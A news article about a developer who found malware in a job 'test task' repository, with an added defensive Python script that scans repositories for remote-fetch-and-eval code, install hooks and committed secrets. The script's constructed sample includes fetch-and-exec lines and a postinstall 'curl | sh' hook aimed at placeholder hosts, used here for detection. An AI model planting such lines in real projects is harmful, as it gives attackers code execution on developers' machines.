Python Software Engineer Vladyslav Bashtannyk spoke on LinkedIn about "pretty high-quality malware" that he discovered in a technical test task.
Vladyslav received the technical test as a GitHub repository. He was asked to complete several tasks: check that the backend works, add an authorization page, and fix the web3 graph on the dashboard page.
Before running anything, the developer did a security review of the code and found patterns that looked like malware: code that could give remote access to his machine or steal tokens and secrets. He reported the findings to the prospective employer.
"While checking the repository before launching, I discovered several critical security issues that prevent me from safely launching it on my local machine. In particular, I found patterns equivalent to remote code execution behavior (dynamic remote fetch + eval execution), unsafe code construction at runtime, suspicious dependency configuration, and hidden secrets inside the repository," Vladyslav wrote.
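The four pattern classes in that list can be checked offline, before anything from the repository is imported, installed or executed. The script below is an example added to this article, not Vladyslav's tooling and not code from the repository he received: it parses Python files with the `ast` module to find `eval`/`exec` whose argument contains a network call, applies line-based heuristics to JavaScript/TypeScript, inspects `package.json` for install hooks and dependencies that do not come from the registry, and greps every file for committed secrets. The sample repository embedded at the bottom is constructed for the demo, and every hostname in it is a placeholder.

```python
"""Offline triage of an unfamiliar repository for the pattern classes listed in the quote above.
Example added to this article (not Vladyslav's tooling); the sample repo below is constructed."""
import ast
import json
import re
import sys
from collections import namedtuple
from pathlib import Path

Finding = namedtuple("Finding", "path line kind detail")  # line 0 = applies to the whole file

# Python: attribute/function names that pull data from the network, and builtins that run strings as code.
FETCH_NAMES = {"get", "post", "urlopen", "request", "fetch"}
CODE_SINKS = {"eval", "exec", "compile", "__import__"}
# JavaScript/TypeScript: line-based heuristics (no JS parser assumed to be installed).
JS_FETCH = re.compile(r"\b(fetch|axios\.(get|post)|https?\.get)\s*\(")
JS_SINK = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bvm\.runIn\w*Context\s*\(")
SECRET_RULES = [
    ("private key block", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("hard-coded credential", re.compile(
        r"(?i)(api[_-]?key|secret|token|password|private[_-]?key)\s*[:=]\s*['\"]?[A-Za-z0-9_\-./+=]{16,}")),
]
NON_REGISTRY_DEP = re.compile(r"^(https?://|git\+|git://|github:|file:)")

def _contains_fetch(node: ast.AST) -> bool:
    """True if some call inside `node` looks like a network fetch (requests.get, urlopen, ...)."""
    return any(isinstance(sub, ast.Call)
               and (getattr(sub.func, "attr", None) or getattr(sub.func, "id", None)) in FETCH_NAMES
               for sub in ast.walk(node))

def scan_python(path: str, text: str) -> list:
    try:
        tree = ast.parse(text)
    except SyntaxError as exc:  # a file the parser rejects still deserves a manual look
        return [Finding(path, exc.lineno or 0, "unparseable python", str(exc))]
    out = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id in CODE_SINKS
                and node.args and not isinstance(node.args[0], ast.Constant)):  # literal strings not flagged
            kind = "remote fetch + code execution" if _contains_fetch(node.args[0]) else "code built at runtime"
            out.append(Finding(path, node.lineno, kind, ast.unparse(node)[:80]))
    return out

def scan_js(path: str, text: str) -> list:
    return [Finding(path, n, "remote fetch + code execution" if JS_FETCH.search(l) else "code built at runtime",
                    l.strip()[:80]) for n, l in enumerate(text.splitlines(), 1) if JS_SINK.search(l)]

def scan_package_json(path: str, text: str) -> list:
    pkg, out = json.loads(text), []
    for hook in ("preinstall", "install", "postinstall", "prepare"):  # executed by `npm install` itself
        if cmd := pkg.get("scripts", {}).get(hook):
            out.append(Finding(path, 0, "install hook runs code", f"{hook}: {cmd}"))
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(section, {}).items():
            if isinstance(spec, str) and NON_REGISTRY_DEP.match(spec):
                out.append(Finding(path, 0, "dependency from non-registry source", f"{name}: {spec}"))
    return out

def scan_secrets(path: str, text: str) -> list:
    return [Finding(path, lineno, kind, line.strip()[:80])
            for lineno, line in enumerate(text.splitlines(), 1)
            for kind, rx in SECRET_RULES if rx.search(line)]

SCANNERS = {".py": scan_python, ".js": scan_js, ".mjs": scan_js, ".cjs": scan_js, ".ts": scan_js, ".tsx": scan_js}

def scan_file(path: str, text: str) -> list:
    name = Path(path).name
    scanner = scan_package_json if name == "package.json" else SCANNERS.get(Path(name).suffix)
    return (scanner(path, text) if scanner else []) + scan_secrets(path, text)

def triage(files: dict) -> list:
    """files maps relative path -> text; returns Findings sorted by path and line."""
    return sorted(f for path, text in files.items() for f in scan_file(path, text))

def scan_tree(root: str) -> list:
    base = Path(root)
    return triage({p.relative_to(base).as_posix(): p.read_text(encoding="utf-8", errors="ignore")
                   for p in base.rglob("*") if p.is_file() and ".git" not in p.relative_to(base).parts})

# Constructed sample "test task" repository that exhibits each pattern class once (placeholder hosts).
SAMPLE_REPO = {
    "backend/updater.py": "import requests\n\ndef refresh():\n"
                          "    exec(requests.get('http://example.invalid/p.txt').text)\n",
    "frontend/src/graph.js": "export async function loadGraph(url) {\n"
                             "  return new Function(await (await fetch(url)).text())();\n}\n",
    "package.json": json.dumps({"name": "dashboard", "version": "1.0.0",
        "scripts": {"postinstall": "node -e \"require('child_process').exec('curl -s http://example.invalid/i.sh|sh')\""},
        "dependencies": {"web3": "^4.0.0", "graph-utils": "git+https://example.invalid/x/graph-utils.git"}}, indent=2),
    ".env": "RPC_URL=https://example.invalid\nDEPLOYER_PRIVATE_KEY=0x" + "ab" * 32 + "\n",
}

if __name__ == "__main__":  # usage: python triage.py [path-to-repo]; exit status 1 when anything is flagged
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else triage(SAMPLE_REPO)
    print("\n".join(f"{f.path}:{f.line}: {f.kind}: {f.detail}" for f in results) or "no findings")
    sys.exit(1 if results else 0)
```

Run it as `python triage.py /path/to/repo`; with no argument it scans the embedded sample and flags five findings across the four classes. It is deliberately a static, deterministic first pass: nothing from the repository is imported or installed, which is the property that matters for a task like this one. The heuristics will miss a fetch-and-eval split across several lines or hidden behind obfuscation, so a hit is a reason to stop, and a clean run is not by itself a reason to proceed.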
After the developer refused to run the project locally, he was simply blocked.
Vladyslav used artificial intelligence to check the code.
In the comments to his post, one developer noted that such cases happen quite often, and that it is safer to use a local virtual machine or a disposable cloud environment to run unfamiliar projects, since even Docker or Podman containers can sometimes be broken out of. He also expressed the opinion that AI can help with code analysis, but that it is only a matter of time before attackers start deliberately overloading the context with hundreds of obfuscated files to make it difficult to detect the dangerous fragments.
At the end of the post, Vladyslav reminded his colleagues: "Do not launch unfamiliar repositories without analysis. Today, a 'test task' can cost you very dearly."